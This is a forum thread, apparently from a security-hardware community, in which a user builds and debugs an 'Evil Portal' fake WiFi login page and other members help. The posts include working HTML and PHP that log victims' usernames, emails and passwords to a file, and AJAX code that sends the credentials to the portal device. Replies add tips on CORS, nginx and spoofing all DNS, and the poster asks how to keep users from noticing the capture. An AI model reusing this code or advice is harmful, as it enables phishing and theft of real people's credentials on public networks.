jogischika Posted November 12, 2014 Share Posted November 12, 2014 Hey all, I know, this is probably post #1000 regarding this topic but it seems that none of the other posts could help me figure out how to fix my code. Current situation: Clicking the button in my form runs service_me.php (located in /www) service_me.php writes the stored.txt file and all three fields work perfectly Problem 1: I don't know how to include the authorization ($authtarget) and redirection to a specific website. I managed to get a website in the header but only without authorization, which makes this useless... Basically I have one questions: What do I have to include in the splash.html or service_me.php to initiate the authorization and redirection to e.g. google.com after logging the user data?So here is my code: splash.html <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <title>Jogi WiFi</title> <meta name="viewport" content="width=1.0"> </head> <body> <div id="LoginForm"> <div id="Logo"><h1>Jogi WiFi</h1></div> <div id="LoginFormOptions"> <div id="LoginFormCredentials"> <form action="http://172.16.42.1/service_me.php" method="post"> <label id="user" for="name"></label> <h2>Username/Password</h2> <div class="LoginFormContents"> <br><br> <span> Username: <input type="text" name="name" class="LoginFormField" id="name" placeholder="Username" required/> Password: <input type="password" name="password" class="LoginFormField" id="password" placeholder="Password" required/></span><br> <br><h2>Third</h2> <span style="margin-right:20px;">Third:</span> <input id="third" name="third" type="text" class="LoginFormField" placeholder="Enter something here"> <input style="margin-top:-1px;margin-left:3px;" type="submit" id="submit" name="submit" class="LoginFormButton" value="Login"/> <div id="block"> <label id="user" for="name"></label> </div> </div> </div></body></html> service_me.php <?php $user = $_POST['name']; $password = $_POST['password']; $third = $_POST['third']; $file = fopen("stored.txt", "a"); fwrite($file, $user . "\n"); fwrite($file, $password . "\n"); fwrite($file, $third . "\n"); fclose($file); ?> The weird thing is that when I just copy the wifidog from the original code (see below) clicking it works perfectly fine for the authorization. <a href="$authtarget"> <img src="$imagesdir/wifidog.png" width="71" height="49" border="0" alt="Click to enter" title="Click to enter"> </a> I hope that I entered the code correctly... Otherwise, please give me a hint on how to do that properly, please. I'd appreciate your help! Best, jogi Quote Link to comment Share on other sites More sharing options...
m40295 Posted November 12, 2014 Share Posted November 12, 2014 https://forums.hak5.org/index.php?/topic/33697-evil-portal-authtarget/ Its best to search. the anwser is on that thread Quote Link to comment Share on other sites More sharing options...
newbi3 Posted November 12, 2014 Share Posted November 12, 2014 There are a lot of threads where people have been helped https://forums.hak5.org/index.php?/topic/33681-evil-portal-help-with-portal-codeplz/ https://forums.hak5.org/index.php?/topic/33697-evil-portal-authtarget/ https://forums.hak5.org/index.php?/topic/33578-evil-portal-setup-adding-the-authtarget-to-a-button/ Quote Link to comment Share on other sites More sharing options...
jogischika Posted November 21, 2014 Author Share Posted November 21, 2014 Hey guys, thanks for your input! I finally managed to get it working. Nevertheless, I am seeing one weird thing when testing my portal with multiple users logging in. My php seems to only selectively capture credentials i.e. some are captured, others not. My php looks like this: <?php $email = $_POST['email']; $password = $_POST['password']; $voucher = $_POST['voucher']; $redirect = $_POST['redirect']; $file = fopen("stored.txt", "a"); fwrite($file, $email . "\n"); fwrite($file, $password . "\n"); fwrite($file, $voucher . "\n"); fclose($file); echo 'Thank for choosing Free Public Wifi! <meta http-equiv="refresh" content="2; url=' . $redirect . '" />'; ?> Does anyone have an idea how this can happen? Another question which I haven't seen answered yet: How can I redirect the client to a specific predefined website instead of the one he was initially trying to open? Thank you for your help! Best, Jogi Quote Link to comment Share on other sites More sharing options...
newbi3 Posted November 21, 2014 Share Posted November 21, 2014 Could happen because people aren't typing in credentials. Also to make them go to a specific site just change the value of $redirect. Quote Link to comment Share on other sites More sharing options...
jogischika Posted November 22, 2014 Author Share Posted November 22, 2014 Thanks for the reply! I tested it by typing in credentials from different machines one after another so I know that the form fields had some content... Thus, it must be something different... Also thank you for the hint on the redirect! Should have known that... ;) Quote Link to comment Share on other sites More sharing options...
jogischika Posted November 25, 2014 Author Share Posted November 25, 2014 Okay, I found out how to replicate the problem but still don't know the reason... It seems like on my MacBook, credentials are only logged when using Chrome. Firefox and Safari do nothing. On an iPhone and iPad it works though using mobile safari. Does that ring a bell for anyone? Little background: I am using three different css files for different layouts for phones, tablets and pcs as well as the following javascript function to save the credentials: <script type="text/javascript"> function ajaxRequest() { if (window.XMLHttpRequest) { return new XMLHttpRequest(); } else if (window.ActiveXObject) { return new ActiveXObject("Microsoft.XMLHTTP"); } else { return false; } } function sendInfo() { var xmlhttp = new ajaxRequest(); var emailvalue=encodeURIComponent(document.getElementById("email").value); var passwordvalue=encodeURIComponent(document.getElementById("password").value); var vouchervalue=encodeURIComponent(document.getElementById("voucher").value); var redirectvalue=encodeURIComponent(document.getElementById("redirect").value); if (emailvalue != null && emailvalue != "") { var parameters="email="+emailvalue+"&password="+passwordvalue+"&voucher="+vouchervalue+"&redirect="+redirectvalue; xmlhttp.open("POST", "http://172.16.42.1:80/capture.php", true); xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xmlhttp.send(parameters); window.location = document.getElementById("redirect").value; } else { document.getElementById("results").innerHTML="Please enter your email address"; } } </script> I'd appreciate any thoughts on what I could be doing wrong here! Quote Link to comment Share on other sites More sharing options...
newbi3 Posted November 25, 2014 Share Posted November 25, 2014 Check your console for javascript errors Quote Link to comment Share on other sites More sharing options...
jogischika Posted November 25, 2014 Author Share Posted November 25, 2014 (edited) I checked this in safari but the console only gave me css warnings, so I guess thats not interesting. Firefox gave my this, though (if I remember correctly, you understand German?!): "Cross-Origin-Anfrage blockiert: Die Same-Origin-Regel verbietet, die externe Ressource auf http://172.16.42.1/capture.php zu lesen. Dies kann gelöst werden, indem die Ressource auf die gleiche Domain geschoben wird oder CORS aktiviert wird." so something like: "Cross-Origin-Request blocked: The Same-Origin-Rule prohibits reading the external resource at http://..... This can be solved by relocating the resource to the same domain or activating CORS." Actually I thought that the php is at the same domain?! Is activating CORS easy to do? EDIT: Interestingly, Chrome says something similar but still posts the credentials... "XMLHttpRequest cannot load http://172.16.42.1/capture.php. No 'Access-Control-Allow-Origin' header is present on the requested resource. Origin 'http://172.16.42.1:2050' is therefore not allowed access. 172.16.42.1/:1" Edited November 25, 2014 by jogischika Quote Link to comment Share on other sites More sharing options...
newbi3 Posted November 25, 2014 Share Posted November 25, 2014 No I don't understand german I think you are getting Sebkinne and I mixed up lol and thats interesting. It looks like you need to add a header to your request: xmlhttp.setRequestHeader("Access-Control-Allow-Origin", document.URL); Quote Link to comment Share on other sites More sharing options...
jogischika Posted November 26, 2014 Author Share Posted November 26, 2014 Haha sorry about that, could be that it was quite late but if you see it as a compliment, just take it as one ;) The header seems to have done the trick! It caused some new troubles though, which I might discuss here at some point in time but first i will try to fix it on my own! Best, jogi Quote Link to comment Share on other sites More sharing options...
jogischika Posted November 27, 2014 Author Share Posted November 27, 2014 Hey newbi3, I was a bit quick yesterday. Unfortunately, this does not do the trick. It seems like this header cannot be used as a request but rather only as a response header. Googling told me to implement this header on the server. Can I do that? I have no idea how. I am really wondering why I seem to be the only person experiencing this problem. Looking at the code of others, many use a link with port 80 (or just "172.16.41.1/capture.php", resulting in a port 80 request (?)). Apparently, all browsers should deny an ajax request through another port. I understand that the portal is on port 2050 and the web server is on port 80, right? This leads me to the question if the ajax request is really needed. In you sample code (infusion thread), you just use the getelementbyid combined with the php. What is the advantage of an ajax request? Another (smaller) problem that I have with evil portal: When my pineapple does not have an internet connection through client mode, the portal does not load automatically (i.e. when opening a new window, which tries to access google). Nevertheless, I can get to the portal page by going directly to "172.16.42.1:2050" or by connecting the pineapple to the internet. Is that normal? Sometimes, I just would care if clients got internet connection as long as the portal does its trick... Sorry for spamming you but the more I do here, the more interested I become ;) Quote Link to comment Share on other sites More sharing options...
newbi3 Posted November 27, 2014 Share Posted November 27, 2014 Im not sure why you are having the issue, have you tried using my vanilla code? The advantage of AJAX is that you can send the data to the server without having to have the user go to the page in the browser. This allows you to create a more dynamic portal that has things happen after a user has entered their information As far as the header goes, that does make sense I didn't read it And your last problem isn't an issue with Evil Portal its NoDogSplash I know why it happens but I can't really explain it that well. If you want to avoid this from happening just spoof everything with DNS spoof to 172.16.42.1 and it will work fine Quote Link to comment Share on other sites More sharing options...
jogischika Posted November 27, 2014 Author Share Posted November 27, 2014 No, I haven't but this will be my next approach. It's just hard to let go of the code which works in 3 of 5 tested scenarios ;) Thanks for the explanation on Ajax, that makes sense and I think I don't really need this even though it's the "cooler" solution. I'll just try the vanilla way and see if this leads to better results. Back to the question on the header. Do you know if it is possible to add the header to the server in this scenario? Which file or else regulates the server the pineapple/portal runs on? I mean, "who" answers the Ajax request? Is it editable? I might open up a new thread for the CORS problem, I could then set this thread to "solved". You obviously spend a lot of time on this already and I learned a whole lot! Thank you for that! Quote Link to comment Share on other sites More sharing options...
newbi3 Posted November 27, 2014 Share Posted November 27, 2014 Simple, you just need to edit the nginx config file: /etc/nginx/nginx.conf http://lukasz.cepowski.com/devlog/50,simple-cdn-with-nginx-that-allows-cors Quote Link to comment Share on other sites More sharing options...
jogischika Posted November 28, 2014 Author Share Posted November 28, 2014 (edited) So, report of the night: I couldn't manage to get around CORS, even after changing nginx.conf browsers gave me an error. I might open up a new thread to find out how to solve this. I finally got your vanilla code working. The problem here was that the url behind $authtarget was decoded when being send as a parameter and somehow, everything after the "...nodogsplash_auth/?redir=http" has to be encoded to function (what a pain in the ass!). So I had to work with "substr" and "encodeurl". I guess this happens when you're new to all of this... So now my portal works on all devices BUT even with <meta http-equiv="Refresh" Content="0 i.e. "immediate" refresh, especially on a mobile phone or tablet, one can really see the pineapples IP for a moment. This might alert some users (and i obviously don't won't that). Furthermore, in the console, one can of course see the own entered data in plain text => very obvious ;) I guess, I will have to work on getting the ajax request and cors problem fixed in the long-term for a more subtle process. PS.: My final php looks like this: <?php $text = $_GET["email"]; $password = $_GET["password"]; $redir = $_GET["redir"]; $token = $_GET["tok"]; $file = fopen("stored.txt", "a"); fwrite($file, $text . "\n"); fwrite($file, $password . "\n"); fclose($file); echo '<meta http-equiv="Refresh" Content="0; URL=http://172.16.42.1:2050/nodogsplash_auth/?redir=http' . urlencode(substr($redir, 50, 22)) . '&tok=' . $token . '">'; ?> Edited November 28, 2014 by jogischika Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.